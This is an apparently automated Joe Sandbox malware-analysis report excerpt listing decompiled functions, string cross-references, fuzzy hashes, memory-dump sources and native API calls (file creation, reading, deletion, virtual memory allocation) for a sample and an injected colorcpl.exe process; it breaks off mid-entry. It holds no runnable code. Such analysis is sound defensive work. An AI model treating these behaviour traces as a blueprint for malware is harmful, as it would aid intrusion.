Instruction Fuzzy Hash: 36D1FBB5A00304AFDB54EFB5CC94FEEB3B8AF49700F04491EE1599E250EBB8A544CB65

Function 034CCF1F Relevance: 10.1, Strings: 8, Instructions: 132COMMON

Download Yara Rule

Strings

m, xrefs: 034CD02B
e, xrefs: 034CD039
i, xrefs: 034CD032
o, xrefs: 034CD017
P, xrefs: 034CD00D
x, xrefs: 034CCF5D
r, xrefs: 034CD021
., xrefs: 034CCF56

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID: .$P$e$i$m$o$r$x
API String ID: 0-620024284
Opcode ID: dccf638dfbba4743f347f220dba992d5e66bd90e820438f40f20245ff7667c7a
Instruction ID: 8ca298f6a9d974ac09ec8d61eb17cde9a543a5b1916f0d47bf6a21ddf4a73505
Opcode Fuzzy Hash: dccf638dfbba4743f347f220dba992d5e66bd90e820438f40f20245ff7667c7a
Instruction Fuzzy Hash: 644185B58103187ADB14EBA1DC44FDE737CAF54301F00869EA50DAF141EBB557888FA5

Function 034CCF24 Relevance: 10.1, Strings: 8, Instructions: 131COMMON

Download Yara Rule

Strings

m, xrefs: 034CD02B
e, xrefs: 034CD039
i, xrefs: 034CD032
o, xrefs: 034CD017
P, xrefs: 034CD00D
x, xrefs: 034CCF5D
r, xrefs: 034CD021
., xrefs: 034CCF56

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID: .$P$e$i$m$o$r$x
API String ID: 0-620024284
Opcode ID: 473a0e311e7a20455bc6ab68cdc1d9e621a17cc6c9e0cc4d886729501b59e3bf
Instruction ID: 9d69ec7f9f7f4f211bb073646f62cfbe816f567bec1bfa6a06d194ab9538c7a1
Opcode Fuzzy Hash: 473a0e311e7a20455bc6ab68cdc1d9e621a17cc6c9e0cc4d886729501b59e3bf
Instruction Fuzzy Hash: 984153BA8103187ADB14EBA1DC44FEE737CAF54301F00869EA50D6F151EBB557888FA5

Function 034DA064 Relevance: 8.9, Strings: 7, Instructions: 119COMMON

Download Yara Rule

Strings

l, xrefs: 034DA0DB
a, xrefs: 034DA0E9
S, xrefs: 034DA0E2
L, xrefs: 034DA0CD
e, xrefs: 034DA0F0
\, xrefs: 034DA129
c, xrefs: 034DA0D4

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID: L$S$\$a$c$e$l
API String ID: 0-3322591375
Opcode ID: 12df838e14265c06af0add5cc6613c1248ec2a1c1f270cb51bd9fbb2c3cdde5f
Instruction ID: b18455c3b4db6fd85626cedc697ffdb0727db71ae2510b4b1cd8c23be0f4f42a
Opcode Fuzzy Hash: 12df838e14265c06af0add5cc6613c1248ec2a1c1f270cb51bd9fbb2c3cdde5f
Instruction Fuzzy Hash: D94197B2C00218AFCB14EFA5DC84BEEF7F8AF88305F05456ED909AB200E77555498B98

Function 034D1BE4 Relevance: 7.7, Strings: 6, Instructions: 171COMMON

Download Yara Rule

Strings

T, xrefs: 034D1C24
r, xrefs: 034D1C40
F, xrefs: 034D1C39
f, xrefs: 034D1C47
x, xrefs: 034D1C4E
P, xrefs: 034D1C1D

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID: F$P$T$f$r$x
API String ID: 0-2523166886
Opcode ID: 1c21e1acbbf1e425c56703c999b5fa2d563235947fd8da4f011c3c5656a2a1ba
Instruction ID: 12fe633deedf389e6048b8ddc57b76cb6da62bd2493c99616e678dc3765021bf
Opcode Fuzzy Hash: 1c21e1acbbf1e425c56703c999b5fa2d563235947fd8da4f011c3c5656a2a1ba
Instruction Fuzzy Hash: 60519471A00305AEEB74DF65C844FEBF7F8AF04704F044A5EA9485E280EBB4A584CBA5

Function 034D1BE1 Relevance: 7.5, Strings: 6, Instructions: 38COMMON

Download Yara Rule

Strings

T, xrefs: 034D1C24
r, xrefs: 034D1C40
F, xrefs: 034D1C39
f, xrefs: 034D1C47
x, xrefs: 034D1C4E
P, xrefs: 034D1C1D

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID: F$P$T$f$r$x
API String ID: 0-2523166886
Opcode ID: ff471e26bdd21a746030d91acf9a22959ae38f3e2ccb0ddf3fe3da5859f64079
Instruction ID: 8b9d0f340b4906787abb433ee6b29a7c82201a031a58a13d862f447a17c62477
Opcode Fuzzy Hash: ff471e26bdd21a746030d91acf9a22959ae38f3e2ccb0ddf3fe3da5859f64079
Instruction Fuzzy Hash: 160181B1D00258AEDF24EFA588096DEBFB8FF45754F00815E9818BF600E7B64A49CB95

Function 034D12E4 Relevance: 6.4, Strings: 5, Instructions: 200COMMON

Download Yara Rule

Strings

l, xrefs: 034D1336
o, xrefs: 034D1328
u, xrefs: 034D1321
i, xrefs: 034D132F
, xrefs: 034D131A

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID: $i$l$o$u
API String ID: 0-2051669658
Opcode ID: 3935aea24c442e5817e38a82a87962eb67a615532fae441f6fa57d0178f683f4
Instruction ID: ccbb32c9cd88b059697879e985a97cca78d314650e32bacfff916f0bb3a76505
Opcode Fuzzy Hash: 3935aea24c442e5817e38a82a87962eb67a615532fae441f6fa57d0178f683f4
Instruction Fuzzy Hash: F36150B1900304AFDB65DBA4CC90FEFB7FCEB88704F148559E51AAB340E635AA45CB64

Function 034D12E2 Relevance: 6.4, Strings: 5, Instructions: 128COMMON

Download Yara Rule

Strings

l, xrefs: 034D1336
o, xrefs: 034D1328
u, xrefs: 034D1321
i, xrefs: 034D132F
, xrefs: 034D131A

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID: $i$l$o$u
API String ID: 0-2051669658
Opcode ID: 2ec89a6bd5553310704223b9b2cc8ca8d6dbf5f302681fed0ec9dc5f87bc23bc
Instruction ID: 4623784d7f0bb339a5d59e260dda257a8f617735ed6824074c7683e7c35655cd
Opcode Fuzzy Hash: 2ec89a6bd5553310704223b9b2cc8ca8d6dbf5f302681fed0ec9dc5f87bc23bc
Instruction Fuzzy Hash: 6D4119B1900308AFDB60DFA5CC94FEFBBF9EB88704F104559E519AB240D774AA45CB64

Function 034D0F74 Relevance: 5.3, Strings: 4, Instructions: 302COMMON

Download Yara Rule

Strings

o, xrefs: 034D0FAA
k, xrefs: 034D0FB1
, xrefs: 034D0FA3
e, xrefs: 034D0FB8

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID: $e$k$o
API String ID: 0-3624523832
Opcode ID: 0680995ac09bb6679138aa3788cf20bbf9d9233c80b23308f0cc2a11c585480d
Instruction ID: 763b25131cd31db53005e98fa373429732f1c923ae38a4e3418918e61e7e38f4
Opcode Fuzzy Hash: 0680995ac09bb6679138aa3788cf20bbf9d9233c80b23308f0cc2a11c585480d
Instruction Fuzzy Hash: 80B13CB5A00308AFDB64DBA5CC94FEFB7FDAF88700F148559F619AB240D671AA41CB50

Function 034D18B4 Relevance: 5.2, Strings: 4, Instructions: 236COMMON

Download Yara Rule

Strings

o, xrefs: 034D1991
e, xrefs: 034D1998
h, xrefs: 034D198A
, xrefs: 034D1983

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID: $e$h$o
API String ID: 0-3662636641
Opcode ID: 09bff9066213d4311d74e2d6c568d461e426e76b52161a77416019423d873a3a
Instruction ID: aa7f6bbb48d8445d49dba6b787fdc6caaef8acfcb7025aeca71e29f3f306957c
Opcode Fuzzy Hash: 09bff9066213d4311d74e2d6c568d461e426e76b52161a77416019423d873a3a
Instruction Fuzzy Hash: 1A8162B6C4021A6EDB64EB65CC44FFFB37CEF44200F0146AEA6195E150EF745B888BA5

Function 034D0F71 Relevance: 5.2, Strings: 4, Instructions: 181COMMON

Download Yara Rule

Strings

o, xrefs: 034D0FAA
k, xrefs: 034D0FB1
, xrefs: 034D0FA3
e, xrefs: 034D0FB8

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID: $e$k$o
API String ID: 0-3624523832
Opcode ID: 30fea08fc51e3783058fa1da0273b47bb4dee15287d9e386d69511471ceaf483
Instruction ID: ca3053a3fc1d773fa3c922e76faf955533ad033dd05f4de05a928aca2b2f8ed3
Opcode Fuzzy Hash: 30fea08fc51e3783058fa1da0273b47bb4dee15287d9e386d69511471ceaf483
Instruction Fuzzy Hash: 57614DB5A00308AFDB54DFA5CC94FEFB7BDAF88700F108559E619AB240D731AA41CB64

Function 034D0E34 Relevance: 5.1, Strings: 4, Instructions: 122COMMON

Download Yara Rule

Strings

FALSETRUE, xrefs: 034D0EB4, 034D0EB9
FALSETRUE, xrefs: 034D0EDC, 034D0EDF
TRUE, xrefs: 034D0F31
TRUE, xrefs: 034D0E9E, 034D0EA1

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
API String ID: 0-2877786613
Opcode ID: 7ff551782777b9032bb630f5a6b22e3ae33dd2235e1c3ec01f05d9f8fb353689
Instruction ID: 3a1fd09d4eaeb83f55bd08a8f347f7d4a0b812896bc76bd99e03bd0d9d19c392
Opcode Fuzzy Hash: 7ff551782777b9032bb630f5a6b22e3ae33dd2235e1c3ec01f05d9f8fb353689
Instruction Fuzzy Hash: DF417C75901259BFEB09EB91CC52FEF773C9F55604F00454AFA006E180DBB06A4587EA

Function 034D0E32 Relevance: 5.1, Strings: 4, Instructions: 119COMMON

Download Yara Rule

Strings

FALSETRUE, xrefs: 034D0EB4, 034D0EB9
FALSETRUE, xrefs: 034D0EDC, 034D0EDF
TRUE, xrefs: 034D0F31
TRUE, xrefs: 034D0E9E, 034D0EA1

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
API String ID: 0-2877786613
Opcode ID: 5baaaaa430b3ef1ea934efde043ad2f7f7ad2b20471973449412f8f5796c0c86
Instruction ID: 0bfa7b4c7b937cf6eb35ffe2f9d248160b8bf547fcc8acf090014dc8f7a1c2fe
Opcode Fuzzy Hash: 5baaaaa430b3ef1ea934efde043ad2f7f7ad2b20471973449412f8f5796c0c86
Instruction Fuzzy Hash: AF318C79901259BFEB09EF91CC52FEF773C9F55604F00444AFA00AE280DBB06A45C7AA

Function 034D18AC Relevance: 5.1, Strings: 4, Instructions: 105COMMON

Download Yara Rule

Strings

o, xrefs: 034D1991
e, xrefs: 034D1998
h, xrefs: 034D198A
, xrefs: 034D1983

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID: $e$h$o
API String ID: 0-3662636641
Opcode ID: ddcb409e1b5b0bffb01fca47fc12cec652720528f97791843c17f4dd14d3cf4c
Instruction ID: b9ca9d2f2738498116bcfe5b60b26e6dfe76d3198b491e1b5570eedd346bd3af
Opcode Fuzzy Hash: ddcb409e1b5b0bffb01fca47fc12cec652720528f97791843c17f4dd14d3cf4c
Instruction Fuzzy Hash: 2C4162B5C4031AAEDB54EB65CC41FEEB3B8EF44300F0046EE9519AA150EFB457888F95

Function 034CD104 Relevance: 5.1, Strings: 4, Instructions: 89COMMON

Download Yara Rule

Strings

0, xrefs: 034CD1D3
0, xrefs: 034CD1CC
P, xrefs: 034CD1DA
5, xrefs: 034CD1E1

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID: 0$0$5$P
API String ID: 0-2673879754
Opcode ID: fd2dc4471faf685cbe621a8230e0bb542a60628d1e3e0e32a9844b2a63a4826b
Instruction ID: d2a2a4057e5640c9f8c9c9cbe323f22dca67da1f886427b701196473c66d60c4
Opcode Fuzzy Hash: fd2dc4471faf685cbe621a8230e0bb542a60628d1e3e0e32a9844b2a63a4826b
Instruction Fuzzy Hash: 71311EB5D10209ABDB14DBA5CD51BEF77B8EF05304F044199E908AA240EBB5AA058BE9

Function 034CE524 Relevance: 5.0, Strings: 4, Instructions: 47COMMON

Download Yara Rule

Strings

o, xrefs: 034CE555
e, xrefs: 034CE563
, xrefs: 034CE54E
k, xrefs: 034CE55C

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID: $e$k$o
API String ID: 0-3624523832
Opcode ID: 8e81ab1ae4a865e92ff074e432ddf3cc98ded2e05488ee24346f78f8e66724bb
Instruction ID: 4b69b55d97d1aa34eeebeb56bffbb8b1e9c16d286871df983c1eeb640433411e
Opcode Fuzzy Hash: 8e81ab1ae4a865e92ff074e432ddf3cc98ded2e05488ee24346f78f8e66724bb
Instruction Fuzzy Hash: 06018EB2900208AFDB14DF99D884ADEB7B9FF08304F04821EE9195F201E7719544CBA4

Function 034BE57B Relevance: 5.0, Strings: 4, Instructions: 28COMMON

Download Yara Rule

Strings

i, xrefs: 034BE5CE
`, xrefs: 034BE5D2
[, xrefs: 034BE5D6
2, xrefs: 034BE5DA

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID: 2$[$`$i
API String ID: 0-3547273708
Opcode ID: 7abf25cb4c6322afc978345cbdc1287a4bbbbf66451560d414ae3c4bb078831c
Instruction ID: ed549f571d08c726997162372df4e1b76d2454de7a0f02b17d0a76d4e7b4924d
Opcode Fuzzy Hash: 7abf25cb4c6322afc978345cbdc1287a4bbbbf66451560d414ae3c4bb078831c
Instruction Fuzzy Hash: BAF01220D082CDDEDB02CBA994442EEBF715F52214F04859AC4F66B282D2754756CB75

Function 034BA8C1 Relevance: 5.0, Strings: 4, Instructions: 24COMMON

Download Yara Rule

Strings

^TYL, xrefs: 034BA8D8
_BQH, xrefs: 034BA8CA
8, xrefs: 034BA8F4
J, xrefs: 034BA8E8

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID: 8$J$^TYL$_BQH
API String ID: 0-2446659844
Opcode ID: 92c77b46b481c9a5e93d40e9f16d2763d2d4bdbb5958a4244003fd7c43241aba
Instruction ID: ddbcead21e7e560e107c78d0deb997e25b19f37596f017e66748cbee3279c1a3
Opcode Fuzzy Hash: 92c77b46b481c9a5e93d40e9f16d2763d2d4bdbb5958a4244003fd7c43241aba
Instruction Fuzzy Hash: 0DF0A071D0024C5EDF00DFA895446EEBFB5EF04300F2185A9D828AF241D3759715CBA2

Function 034BA8C4 Relevance: 5.0, Strings: 4, Instructions: 24COMMON

Download Yara Rule

Strings

^TYL, xrefs: 034BA8D8
_BQH, xrefs: 034BA8CA
8, xrefs: 034BA8F4
J, xrefs: 034BA8E8

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID: 8$J$^TYL$_BQH
API String ID: 0-2446659844
Opcode ID: be97e1b0d87a9f4cabc0f74deb133d06e83ce99a0b330850c545c50cb3f768e7
Instruction ID: 5a63ab7ba2de8ad1bf6aa7940b9f9a7b7f666171a00e24ca52822564359ff584
Opcode Fuzzy Hash: be97e1b0d87a9f4cabc0f74deb133d06e83ce99a0b330850c545c50cb3f768e7
Instruction Fuzzy Hash: 79F0A071D0024C5ACB00DFA889446EEBBB8AF00300F5084A8D8186F241D7759715CBA6

Analysis Process: colorcpl.exePID: 7964, Parent PID: 5580COMMON

Execution Graph

Execution Coverage:	2.5%
Dynamic/Decrypted Code Coverage:	4.2%
Signature Coverage:	0.7%
Total number of Nodes:	448
Total number of Limit Nodes:	75

Executed Functions

Function 029BA020 Relevance: 22.8, Strings: 18, Instructions: 330
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

6<, xrefs: 029BA134
w}, xrefs: 029BA0DB
cs, xrefs: 029BA239
({, xrefs: 029BA568, 029BA587
d, xrefs: 029BA09F
B, xrefs: 029BA06D
g, xrefs: 029BA210
b7, xrefs: 029BA174
i2, xrefs: 029BA082
#]({, xrefs: 029BA4E7
g|, xrefs: 029BA036
0., xrefs: 029BA518
i, xrefs: 029BA192
&, xrefs: 029BA0C7
I&, xrefs: 029BA17E
M, xrefs: 029BA074
, xrefs: 029BA05F
{, xrefs: 029BA145

Memory Dump Source

Source File: 00000006.00000002.3628491294.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_29b0000_colorcpl.jbxd

Yara matches

Similarity

API ID:
String ID: $#]({$&$0.$6<$B$I&$M$b7$cs$d$g|$i2$w}${$({$g$i
API String ID: 0-670344866
Opcode ID: 594cd1bc23ea6cdee04cf63f5cf2a364484d5df06730a962a0e776980164865e
Instruction ID: f0f2adf8d54cf3b0fa3d67c38cf2da0bf9c024be428043329f48f9a3570b9390
Opcode Fuzzy Hash: 594cd1bc23ea6cdee04cf63f5cf2a364484d5df06730a962a0e776980164865e
Instruction Fuzzy Hash: 1202C1B0D15269CBEB25CF84D998BEDBBB2FF44308F108599D4097B280D7B95A88CF54

Function 029CC5A0 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00000000), ref: 029CC684
FindNextFileW.KERNELBASE(?,00000010), ref: 029CC6BF
FindClose.KERNELBASE(?), ref: 029CC6CA

Memory Dump Source

Source File: 00000006.00000002.3628491294.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_29b0000_colorcpl.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: d7a53fc205c1e2a0d4300aa0bd2310b9c041bb9a045de18f694fe0953a00f140
Instruction ID: 72378279f3a078602dc74e41e318afd10c647485b05981ac4cb3f625a7e7023d
Opcode Fuzzy Hash: d7a53fc205c1e2a0d4300aa0bd2310b9c041bb9a045de18f694fe0953a00f140
Instruction Fuzzy Hash: AB3173729002097BDB20EB60CD85FEE777DDF84709F24449DF90CA7190DB70AA948BA1

Function 029D91D0 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(F220719C,?,?,?,?,?,?,?,?,?,?), ref: 029D92CB

Memory Dump Source

Source File: 00000006.00000002.3628491294.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_29b0000_colorcpl.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 20c5161cfaca4839c49affc46277ea3bea1e0bf3a60c53bf07eb32d75ac4a110
Instruction ID: 880280187f97044f591bb1759c3f4063736391bcaa60cfc93f8d27aa5cb2b300
Opcode Fuzzy Hash: 20c5161cfaca4839c49affc46277ea3bea1e0bf3a60c53bf07eb32d75ac4a110
Instruction Fuzzy Hash: C231D2B5A01248AFDB54DF98D880EEEB7BAAF8C314F108109F918A7344D730A9518FA4

Function 029D9340 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(F220719C,?,?,?,?,?,?,?,?), ref: 029D9426

Memory Dump Source

Source File: 00000006.00000002.3628491294.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_29b0000_colorcpl.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 36efc90a191cc8e1acb2cbc95141c0817a0f98ded27903fbb6edd25e471f27f6
Instruction ID: eefaf9840e2a356e268bc2678ae20123a39b8ff6f2c245dd91d4599c4de3316f
Opcode Fuzzy Hash: 36efc90a191cc8e1acb2cbc95141c0817a0f98ded27903fbb6edd25e471f27f6
Instruction Fuzzy Hash: 9C31D6B5A00248AFDB14DF99D880EDFB7F9EF88714F108119F919A7344D770A9128FA5

Function 029D9630 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(F220719C,?,029D7FAF,00000000,00000004,00003000,?,?,?,?,?,029D7FAF,029C1CFE,?,?,029DB531), ref: 029D96F5

Memory Dump Source

Source File: 00000006.00000002.3628491294.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_29b0000_colorcpl.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: f3d51badda918de2a86f990eb0f76ba4b381a6515067e10652c0fa729351f4dc
Instruction ID: 9c84d81e420a60c7181d4bf2e8d067874bb0f98a3d9b6f3952c341bd16959551
Opcode Fuzzy Hash: f3d51badda918de2a86f990eb0f76ba4b381a6515067e10652c0fa729351f4dc
Instruction Fuzzy Hash: F021F9B5A10249ABDB10DF98DC81EEFB7B9EF88710F108509FD18AB244D774A9118FA5

Function 029D9430 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON

Download Yara Rule

APIs

NtDeleteFile.NTDLL(F220719C), ref: 029D94C3

Memory Dump Source

Source File: 00000006.00000002.3628491294.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_29b0000_colorcpl.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: d84acbae1e84c4a0f62d7dbffb82efe3ab1ede5f77e3ac6583c6cd22b51cb7f9
Instruction ID: a180794e09fe59abd76828e3a4edd872bed882f9e92875ed6a41a1d3813446c0
Opcode Fuzzy Hash: d84acbae1e84c4a0f62d7dbffb82efe3ab1ede5f77e3ac6583c6cd22b51cb7f9
Instruction Fuzzy Hash: 14115E71A102087BD620EBA4CC41FEFB7ADDF85714F508149FA1CAA280D77079168BA5

Function 029D94D0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(029D17C1,?,00000000,?,?,029D17C1,?,0000F71F), ref: 029D9504

Memory Dump Source

Source File: 00000006.00000002.3628491294.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_29b0000_colorcpl.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: d72440d65b0c06861669640819b658a19e7f91c22ad93aaab60b09b481231f25
Instruction ID: 6944b16af7c25486267cc1917b141272aaee15adc0286b7038e132795f0446cd
Opcode Fuzzy Hash: d72440d65b0c06861669640819b658a19e7f91c22ad93aaab60b09b481231f25
Instruction Fuzzy Hash: DEE046762502087BD621EA5ADC41FDB77AEDFC5760F418015FA0CAB241C671BA128AA4

Function 04BD4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04BD465A

Memory Dump Source

Source File: 00000006.00000002.3630083758.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true

Associated: 00000006.00000002.3630083758.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b60000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 389be4e2f14e39577ad3a70bd35ae778981b66e006a944572e78f6f586bd19cc
Instruction ID: 5e88fff349d7789f19231898057281b75ebf4053a9ae92a179bdaebbace3f706
Opcode Fuzzy Hash: 389be4e2f14e39577ad3a70bd35ae778981b66e006a944572e78f6f586bd19cc
Instruction Fuzzy Hash: 5D900262601900426140715948044166005DBE1305395D155A0555661C871CD956A269

Function 04BD4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04BD434A

Memory Dump Source

Source File: 00000006.00000002.3630083758.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true

Associated: 00000006.00000002.3630083758.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b60000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 111beadbbacc38beeac58629a4bd6724ba6391a153848c8e473aa12f00f82baf
Instruction ID: bff882775f5e14b8b296d0ee46c7111ecdca16c130ca4e577b548cb043185b21
Opcode Fuzzy Hash: 111beadbbacc38beeac58629a4bd6724ba6391a153848c8e473aa12f00f82baf
Instruction Fuzzy Hash: 31900232605C0012B140715948845564005DBE0305B55D051E0425655C8B18DA576361

Function 04BD2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04BD2CAA

Memory Dump Source

Source File: 00000006.00000002.3630083758.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true

Associated: 00000006.00000002.3630083758.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b60000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3b0c7a00e9136beb1f379726de6127f48dc4d131df2f32ddca209df9cecdc39c
Instruction ID: 24dfd854b1d47dee5fcec5bb9829309ce57904cbb2faaf38374f8b5a52e83e47
